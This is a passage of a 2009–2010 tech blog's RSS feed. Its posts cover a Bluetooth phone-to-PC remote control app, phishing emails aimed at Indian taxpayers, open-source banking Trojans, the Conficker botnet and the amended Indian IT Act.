		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[funny]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[Mobile 2 PC]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=466</guid>
		<description><![CDATA[Mobilewitch Bluetooth Remote Control is a free of charge program that can be used to control your computer from distance. The main purpose of this software is to turn your mobile phone into a universal PC remote control. The application is perfect for business as well as for your own enjoyment. Now you can easily &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/01/12/mobilewitch-bluetooth-remote-control/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/Mobilewitch-Bluetooth-Remote-Control.jpg" alt="Mobilewitch Bluetooth Remote Control image 1" width="90" height="120" align="left" />Mobilewitch Bluetooth Remote Control is a free of charge program that can be used to control your computer from distance. The main purpose of this software is to turn your mobile phone into a universal PC remote control.</p>
<p>The application is perfect for business as well as for your own enjoyment. Now you can easily remote control your PowerPoint presentations, Mouse Cursor or simply explore the content of your computer directly from your mobile phone.</p>
<p>Tones of handy features will be available after installing the software. You will be able to change the tracks and videos played on Media Player or Winamp, browse for artists, albums or adjust the volume. The application will also give you remote access to programs such as Windows Explorer, Internet Explorer or Firefox. In the same time you will be able to Run commands on your computer or send text messages to your desktop.</p>
<p>The program consists of two parts &#8211; the client and the server (both being written in Java). The former is located into a J2ME capable mobile phone with Bluetooth capabilities while the latter is placed in the computer you wish to remotely control.</p>
<p>So, all you need for this software to run is a mobile phone with Bluetooth™ support and a Bluetooth dongle installed on your computer.</p>
<p>In order to start using the Mobilewitch Bluetooth Remote Control you first need to download  and install both <strong>Mobile Application</strong> and <strong>PC Server</strong><strong>. </strong>In case of Nokia mobile phones, the <a href="http://europe.nokia.com/A4144905"><strong>Nokia PC Suite</strong></a> will automatically recognize and prompt you to install the application on your handset.</p>
<p>After the installation is complete, please use the following steps:</p>
<p><strong>Step 1</strong></p>
<p>Start the PC Server application first</p>
<p><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-pc-server_01.jpg" alt="Mobilewitch Bluetooth Remote Control image 1" width="245" height="196" /> <img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-pc-server_02.jpg" alt="Mobilewitch Bluetooth Remote Control image 2" width="245" height="196" /></p>
<p><strong>Step 2</strong></p>
<p>Start the Mobile Application. On Nokia phones the shortcut is located in Menu/Applications/Collection. The phone will automatically start searching for active devices.</p>
<p>Once both devices are connected you will be able to access the Mobilewitch Bluetooth Remote Control Menu from your phone.</p>
<p><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_01.jpg" alt="Mobilewitch Bluetooth Remote Control image 1" width="245" height="327" /> <img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_02.jpg" alt="Mobilewitch Bluetooth Remote Control image 2" width="245" height="327" /></p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-466"></span></p>
<p>From this menu you will be able to control your mouse cursor, keyboard and the following programs, if installed on your computer: Windows Explorer, Firefox, Window Media Player, Internet Explorer, Winamp and Powerpoint. Please note that each application you would like to control has to be first started from the computer and needs to be Always On Top of your desktop.</p>
<p><a href="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_03big.jpg" target="_blank"><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_03.jpg" alt="Mobilewitch Bluetooth Remote Control image 1" width="163" height="217" /></a> <a href="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_04big.jpg" target="_blank"><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_04.jpg" alt="Mobilewitch Bluetooth Remote Control image 2" width="163" height="217" /></a> <a href="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_05big.jpg" target="_blank"><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/mobilewitch-bluetooth-remote-control_05.jpg" alt="Mobilewitch Bluetooth Remote Control image 3" width="163" height="217" /></a></p>
<h2>Features</h2>
<p>- Remotely control Mouse, Keyboard, PowerPoint, Winamp, Windows Media Player and much more<br />
- Get access to your desktop from your phone<br />
- Bluetooth setup free! Simply connect from your phone<br />
- Customize your applications through Keymaps or VB and JScripts<br />
- Supports all PC Bluetooth solutions Toshiba, Windows, BlueSoleil and Widcomm/Broadcom</p>
<p><a href="http://www.mobilewitch.com/download/mobile-witch-remote-control-free.exe"><img src="http://www.mobilewitch.com/pics/news_reviewsimg/software_page/MW-Remote-Control/download_button.gif" alt="Mobilewitch Bluetooth Remote Control image 1" width="108" height="52" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/01/12/mobilewitch-bluetooth-remote-control/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Thousands of income taxpayers received ‘fake’ emails from ‘phishers’ and ‘hackers’</title>
		<link>http://techblog.cyberphunkz.com/2010/01/06/thousands-of-income-taxpayers-received-%e2%80%98fake%e2%80%99-emails-from-%e2%80%98phishers%e2%80%99-and-%e2%80%98hackers%e2%80%99/</link>
		<comments>http://techblog.cyberphunkz.com/2010/01/06/thousands-of-income-taxpayers-received-%e2%80%98fake%e2%80%99-emails-from-%e2%80%98phishers%e2%80%99-and-%e2%80%98hackers%e2%80%99/#comments</comments>
		<pubDate>Wed, 06 Jan 2010 06:06:07 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[Income Tax]]></category>
		<category><![CDATA[phishing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=461</guid>
		<description><![CDATA[Thousands of income taxpayers were flummoxed by ‘fake’ emails received from ‘phishers’ and ‘hackers’ on Monday seeking their personal and financial details ahead of refunds payment. Fake mails also lead the taxpayers to links that are mirror images of the income tax (I-T) department’s website and seek sensitive information including bank accounts details, among other &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2010/01/06/thousands-of-income-taxpayers-received-%e2%80%98fake%e2%80%99-emails-from-%e2%80%98phishers%e2%80%99-and-%e2%80%98hackers%e2%80%99/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<div>
<div>Thousands of income taxpayers were flummoxed by ‘fake’ emails received from ‘phishers’ and ‘hackers’ on Monday seeking their personal and financial details ahead of refunds payment.</div>
<div>Fake mails also lead the taxpayers to links that are mirror images of the income tax (I-T) department’s website and seek sensitive information including bank accounts details, among other financial details. The mails in circulation are regarded by a huge section of I-Tax department as nothing but ‘spam mail’. But, others do see the vulnerability of the I-T department’s large database and its website that links crores of taxpayers, both individual and companies.</div>
</div>
<p><a href="http://1.bp.blogspot.com/_1Rgvx77sTm4/S0L4pLwsDLI/AAAAAAAACYo/VixMBJrE_FI/s1600-h/Thousands+of+income+taxpayers+received+%E2%80%98fake%E2%80%99+emails+from+%E2%80%98phishers%E2%80%99+and+%E2%80%98hackers%E2%80%99.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img id="BLOGGER_PHOTO_ID_5423170287722826930" style="cursor: pointer; width: 234px; height: 320px;" src="http://1.bp.blogspot.com/_1Rgvx77sTm4/S0L4pLwsDLI/AAAAAAAACYo/VixMBJrE_FI/s320/Thousands+of+income+taxpayers+received+%E2%80%98fake%E2%80%99+emails+from+%E2%80%98phishers%E2%80%99+and+%E2%80%98hackers%E2%80%99.jpg" border="0" alt="" /></a> <span style="white-space: pre;"> </span> <span style="white-space: pre;"> </span><a href="http://2.bp.blogspot.com/_1Rgvx77sTm4/S0L4onDXxTI/AAAAAAAACYg/xD2DgUH4x2U/s1600-h/Hacking-and-Cyber-Attack.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img id="BLOGGER_PHOTO_ID_5423170277869077810" style="cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_1Rgvx77sTm4/S0L4onDXxTI/AAAAAAAACYg/xD2DgUH4x2U/s320/Hacking-and-Cyber-Attack.jpg" border="0" alt="" /></a></p>
<div>
<div>Gulshan Rai, director general, CERT-IN at the department of information technology, told Financial Chronicle, “Online security has been a huge concern for the industry. With the growth of websites, emails phishing and hacking has increased to a great extent. We do see a lot of spam emails being circulated for financial gains. We need to educate individuals on online security.”</div>
<div></div>
<div>These emails, which have their origin from a web address not related the I-T department, have led to confusion and anxiety on the security of financial data uploaded by individuals and companies.</div>
<div><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-461"></span></div>
<div></div>
<div>But the I-T department has clarified that links with fake mails under circulation only reflect the mirror image of the I-T department&#8217;s website. The I-T department has maintained that neither the website nor its intra-net data has been either hacked or compromised. The I-T department has also said that it does not send emails on refunds and does not seek any information regarding credit cards of taxpayers. “To create mirror image of a website, there is no need to hack it. The I-T website has not been hacked. We have taken appropriate steps to prevent such incidents,” said Shishir Jha, IT commissioner and spokesperson, central board of direct taxes.</div>
<div></div>
<div>In October, the I-T department received several complaints from taxpayers about phishing. An additional commissioner of the I-T department, who did not wish to be identified, confirmed that the site was hacked in October 2009. Following the incident, the I-T department in a news release, said, “Information has been received from several quarters that people are receiving electronic mail informing them of their income-tax refunds and seeking their credit card details. The email is sent from the following or similar mailing addresses — lhxbkw@ accounts.net or cvhfvs@ accounts.net.”</div>
<div></div>
<div>The department cautioned taxpayers against giving out information on credit cards and accounts details online. Mails received by taxpayers on Monday also originated from similar addresses. Efforts made by FC to contact the director general (systems) at the I-Tax department were unsuccessful. Lakshmi Prasad, in-charge of systems at I-T department was not available for comment.</div>
<div></div>
<div>SOURCE: mydigitalfc</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2010/01/06/thousands-of-income-taxpayers-received-%e2%80%98fake%e2%80%99-emails-from-%e2%80%98phishers%e2%80%99-and-%e2%80%98hackers%e2%80%99/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The True Odds of Airborne Terror</title>
		<link>http://techblog.cyberphunkz.com/2009/12/31/the-true-odds-of-airborne-terror/</link>
		<comments>http://techblog.cyberphunkz.com/2009/12/31/the-true-odds-of-airborne-terror/#comments</comments>
		<pubDate>Thu, 31 Dec 2009 06:24:02 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Buildings]]></category>
		<category><![CDATA[funny]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=445</guid>
		<description><![CDATA[What&#8217;s the actual risk of an airplane attack? Here&#8217;s the definitive chart. Source: fivethirtyeight]]></description>
			<content:encoded><![CDATA[<p>What&#8217;s the actual risk of an airplane attack? Here&#8217;s the definitive chart.</p>
<p><a href="http://2.bp.blogspot.com/_mmBw3uzPnJI/SzvDK40xfyI/AAAAAAAA8tQ/zYD0s11mrew/s1600-h/true_odds_of_airborne_terror_01.jpg"><img id="BLOGGER_PHOTO_ID_5421141168290365218" style="cursor: pointer; width: 400px; height: 398px;" src="http://2.bp.blogspot.com/_mmBw3uzPnJI/SzvDK40xfyI/AAAAAAAA8tQ/zYD0s11mrew/s400/true_odds_of_airborne_terror_01.jpg" border="0" alt="" /></a></p>
<p><a href="http://1.bp.blogspot.com/_mmBw3uzPnJI/SzvDKoPhNKI/AAAAAAAA8tI/iPD-3KzawI4/s1600-h/true_odds_of_airborne_terror_02.jpg"><img id="BLOGGER_PHOTO_ID_5421141163839141026" style="cursor: pointer; width: 400px; height: 201px;" src="http://1.bp.blogspot.com/_mmBw3uzPnJI/SzvDKoPhNKI/AAAAAAAA8tI/iPD-3KzawI4/s400/true_odds_of_airborne_terror_02.jpg" border="0" alt="" /></a></p>
<p><a href="http://2.bp.blogspot.com/_mmBw3uzPnJI/SzvDKT8T58I/AAAAAAAA8tA/R3EBTRT8s74/s1600-h/true_odds_of_airborne_terror_03.jpg"><img id="BLOGGER_PHOTO_ID_5421141158389868482" style="cursor: pointer; width: 400px; height: 153px;" src="http://2.bp.blogspot.com/_mmBw3uzPnJI/SzvDKT8T58I/AAAAAAAA8tA/R3EBTRT8s74/s400/true_odds_of_airborne_terror_03.jpg" border="0" alt="" /></a></p>
<p><a href="http://3.bp.blogspot.com/_mmBw3uzPnJI/SzvDKMuZNFI/AAAAAAAA8s4/7UeMXx2G9Ac/s1600-h/true_odds_of_airborne_terror_04.jpg"><img id="BLOGGER_PHOTO_ID_5421141156452447314" style="cursor: pointer; width: 400px; height: 391px;" src="http://3.bp.blogspot.com/_mmBw3uzPnJI/SzvDKMuZNFI/AAAAAAAA8s4/7UeMXx2G9Ac/s400/true_odds_of_airborne_terror_04.jpg" border="0" alt="" /></a></p>
<p><a href="http://3.bp.blogspot.com/_mmBw3uzPnJI/SzvDJs7D7LI/AAAAAAAA8sw/BN04e7GgIjs/s1600-h/true_odds_of_airborne_terror_05.jpg"><img id="BLOGGER_PHOTO_ID_5421141147915644082" style="cursor: pointer; width: 400px; height: 346px;" src="http://3.bp.blogspot.com/_mmBw3uzPnJI/SzvDJs7D7LI/AAAAAAAA8sw/BN04e7GgIjs/s400/true_odds_of_airborne_terror_05.jpg" border="0" alt="" /></a><br />
Source: <a href="http://www.fivethirtyeight.com/2009/12/odds-of-airborne-terror.html" target="_blank">fivethirtyeight</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/12/31/the-true-odds-of-airborne-terror/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Do You Evacuate a Huge Cougar Helicopter from the Battlefield?</title>
		<link>http://techblog.cyberphunkz.com/2009/12/31/how-do-you-evacuate-a-huge-cougar-helicopter-from-the-battlefield/</link>
		<comments>http://techblog.cyberphunkz.com/2009/12/31/how-do-you-evacuate-a-huge-cougar-helicopter-from-the-battlefield/#comments</comments>
		<pubDate>Thu, 31 Dec 2009 06:21:25 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=442</guid>
		<description><![CDATA[With the &#8220;biggest, most powerful helicopter ever to have gone into production&#8221;—Wikipedia says—that&#8217;s how. Here you have the mythical Russian Mi-26 sling-loading and taking away a NATO AS532 Cougar, hit in battle in Afghanistan.]]></description>
			<content:encoded><![CDATA[<p>With the &#8220;biggest, most powerful helicopter ever to have gone into production&#8221;—Wikipedia says—that&#8217;s how. Here you have the mythical Russian Mi-26 sling-loading and taking away a NATO AS532 Cougar, hit in battle in Afghanistan.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="370" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="wmode" value="transparent" /><param name="src" value="http://www.liveleak.com/e/df4_1262187191" /><embed type="application/x-shockwave-flash" width="450" height="370" src="http://www.liveleak.com/e/df4_1262187191" wmode="transparent"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/12/31/how-do-you-evacuate-a-huge-cougar-helicopter-from-the-battlefield/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Why malware writers are turning to open source</title>
		<link>http://techblog.cyberphunkz.com/2009/11/05/why-malware-writers-are-turning-to-open-source/</link>
		<comments>http://techblog.cyberphunkz.com/2009/11/05/why-malware-writers-are-turning-to-open-source/#comments</comments>
		<pubDate>Thu, 05 Nov 2009 04:33:26 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=430</guid>
		<description><![CDATA[Fraudsters collaborating on software to steal bank details By Nick Heath 18 September 2009 http://software.silicon.com/security/0,39024655,39525925,00.htm Malware developers are going open source in an effort to make their malicious software more useful to fraudsters. By giving criminal coders free access to malware that steals financial and personal details, the malicious software developers are hoping to expand &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/11/05/why-malware-writers-are-turning-to-open-source/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em><span style="font-size: 11pt; color: maroon;">Fraudsters collaborating on software to steal bank details</span></em></strong></p>
<p><span style="font-size: 11pt;">By Nick Heath</span></p>
<p><span style="font-size: 11pt;">18 September 2009</span></p>
<p><span style="font-size: 11pt;"><a href="http://software.silicon.com/security/0,39024655,39525925,00.htm" target="_blank">http://software.silicon.com/security/0,39024655,39525925,00.htm</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Malware developers are going open source in an effort to make their malicious software more useful to fraudsters.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">By giving criminal coders free access to malware that steals financial and personal details, the malicious software developers are hoping to expand the capabilities of old Trojans.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">According to Candid Wüest, threat researcher with security firm Symantec, around 10 per cent of the Trojan market is now open source.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The move to an open source business model is allowing criminals to add extra features to their malware.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">&#8220;The advantages are that you have more people involved in developing it, so someone who is into cryptography could add a cryptographic plug-in or somebody who does video streaming could add remote streaming of the desktop,&#8221; Wüest said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Releasing Trojans as open source dates back to 1999, when the Cult of the Dead Cow group released the source code for its Trojan called Back Orifice.</span></p>
<p><span style="font-size: 11pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-430"></span><br />
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">More recently, the developers of the Limbo Trojan published its source code in an effort to boost take-up following a slump in its use by fraudsters.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Following its release in 2007, the Limbo Trojan became the most widely used Trojan in the world but fell from favour in 2008 after the more sophisticated Zeus Trojan was released, according to security company RSA.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">There is a big cash incentive to be the dominant Trojan, with infected machines and the financial and personal details they capture worth millions of dollars on the black market. <span style="color: maroon;">The Limbo Trojan kit was previously sold to fraudsters for $350 per time before it went open source, while the Zeus Trojan today sells for between $1,000 to $3,000.</span></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">However, head of new technologies at RSA Uri Rivner said the move to become open source had not reversed Limbo&#8217;s decline in fortunes.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;It is a move to the same business model as that behind any open source project &#8211; to give away a basic version and sell more advanced versions, professional services or customisations.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;At the beginning of it going open source it was big news but people have since stopped investing in it.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;It is not the best Trojan any more but because it&#8217;s open source you can try it as your first Trojan and it is still used in some places,&#8221; he said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Limbo&#8217;s popularity continues to slump, despite numerous features in the basic version that allow criminals to add extra fields for PIN numbers into fake banking websites and capture the keystrokes and the files saved on an infected computer.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">And while open source may not have boosted Limbo&#8217;s fortunes, it also brings with it separate problems for the fraudsters: open sourcing code also places it in the hands of security professionals.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;If you make [the Trojan] open source that means that a security company can find the source code and it is easier to make a general heuristic detection for it, as they know what could be in it,&#8221; Symantec&#8217;s Wüest said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The majority of Trojan infections occur via driv- by downloads, where the malware is automatically downloaded after browsing an infected website, or messages sent via social networking sites that encourage people to download a Trojan masquerading as a legitimate security update, according to RSA&#8217;s Rivner.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">These infection methods are proving far more effective at getting Trojans onto machines than earlier techniques such as sending an email with a link to an infected file or attachment.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">RSA analysts say these new methods have fuelled an exponential growth in the rate of infection, with the security firm detecting 613 Trojan infections in August 2008 compared to 19,102 in August 2009.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/11/05/why-malware-writers-are-turning-to-open-source/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conficker as a weapon for Cyber attack</title>
		<link>http://techblog.cyberphunkz.com/2009/11/04/conficker-as-a-weapon-for-cyber-attack/</link>
		<comments>http://techblog.cyberphunkz.com/2009/11/04/conficker-as-a-weapon-for-cyber-attack/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 03:39:20 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[conficker]]></category>
		<category><![CDATA[DDOS]]></category>
		<category><![CDATA[WMD]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=427</guid>
		<description><![CDATA[Conficker worm could be &#8216;weaponized,&#8217; web security researcher warns November 2, 2009 http://www.mxlogic.com/securitynews/viruses-worms/conficker-worm-could-be-weaponized-web-security-researcher-warns574.cfm In the year since the inception of the Conficker worm, a malicious strain of virus that has infected computers all over the globe, security researchers have tracked its spread to as many as 7 million machines. Although internet security researchers at the &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/11/04/conficker-as-a-weapon-for-cyber-attack/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em><span style="font-size: 11pt; color: maroon;">Conficker worm could be &#8216;weaponized,&#8217; web security researcher warns</span></em></strong></p>
<p><span style="font-size: 11pt;">November 2, 2009</span></p>
<p><span style="font-size: 11pt;"><a href="http://www.mxlogic.com/securitynews/viruses-worms/conficker-worm-could-be-weaponized-web-security-researcher-warns574.cfm" target="_blank">http://www.mxlogic.com/securitynews/viruses-worms/conficker-worm-could-be-weaponized-web-security-researcher-warns574.cfm</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">In the year since the inception of the Conficker worm, a malicious strain of virus that has infected computers all over the globe, security researchers have tracked its spread to as many as 7 million machines.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Although internet security researchers at the Conficker Working Group advise that it is impossible to track the exact number of PCs infected by Conficker, the latest estimates put the worm&#8217;s spread at around the 7 million mark, a milestone in the making of a huge botnet, according to Computerworld.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Botnets are controlled by hackers, cyber criminals or sometimes governments for the purpose of launching spam, malware and distributed denial-of-service attacks (DDOS), which can overpower website servers with malicious traffic that slows or crashes websites.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">As an element of cyber war, DDOS attacks require a large enough botnet to overpower defenses, according to security experts. Andre DiMino, co-founder of The Shadowserver Foundation, said a botnet the size of Conficker could be &#8220;weaponized&#8221; in a cyber attack.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;This is certainly a botnet that could be weaponized,&#8221; DeMino said, according to Computerworld. &#8220;When you have a net of this magnitude, the sky&#8217;s the limit in terms of what could be done.&#8221;</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">DDOS attacks launched last July shut down government, banking and commercial sites in the U.S. and South Korea. Smaller attacks have hit sites like Twitter, Facebook and news websites.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/11/04/conficker-as-a-weapon-for-cyber-attack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NOTIFIED : Amended Indian IT Act comes into effect</title>
		<link>http://techblog.cyberphunkz.com/2009/10/28/notified-amended-indian-it-act-comes-into-effect/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/28/notified-amended-indian-it-act-comes-into-effect/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 17:14:53 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[Indian IT Act 2008]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=419</guid>
		<description><![CDATA[CRPCC TEAM with inputs from PIB and PTI October 27, 2009 The Information Technology (Amendment) Act 2008 comes into force from 27 October 2009. The amended act provides for tightening procedures and safeguards for monitoring and interception of data to prevent computer and cyber crimes. &#8220;The IT (Amendment) Act 2008 came into force today,&#8221; an &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/28/notified-amended-indian-it-act-comes-into-effect/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;">CRPCC TEAM with inputs from PIB and PTI</span></p>
<p><span style="font-size: 11pt;">October 27, 2009</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The Information Technology (Amendment) Act 2008 comes into force from 27 October 2009. The amended act provides for tightening procedures and safeguards for monitoring and interception of data to prevent computer and cyber crimes.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;The IT (Amendment) Act 2008 came into force today,&#8221; an official statement said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Besides monitoring and interception, the amended Act also makes Indian Computer Emergency Response Team (CERT-In), a body created as per the act of parliament. CENRT-In has been provided with wider powers and responsibilities to deals with computer security and various situations arising from cyber attacks.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The IT (Amendment) Act 2008 was passed by both the houses of Parliament on December 22 and 23, 2008. The Act was notified after the assent of President on February 5, 2009.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The amendment and notified rules pertaining to various sections of the act, dealing with Procedure and Safeguards for Interception, Monitoring and Decryption of Information, Blocking Access of Information by Public and Monitoring and Collecting Traffic Data.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The Information Technology Act was enacted in 2000 with a view to provide legal recognition to e-commerce and e-transactions, to facilitate e-governance and prevent computer-based crimes.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">However, the rapid increase in the use of internet has led to a spate in crime like child pornography, cyber terrorism, publishing sexually explicit content in electronic form and video voyeurism. So, penal provisions were required to be included in the Information Technology Act, 2000.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
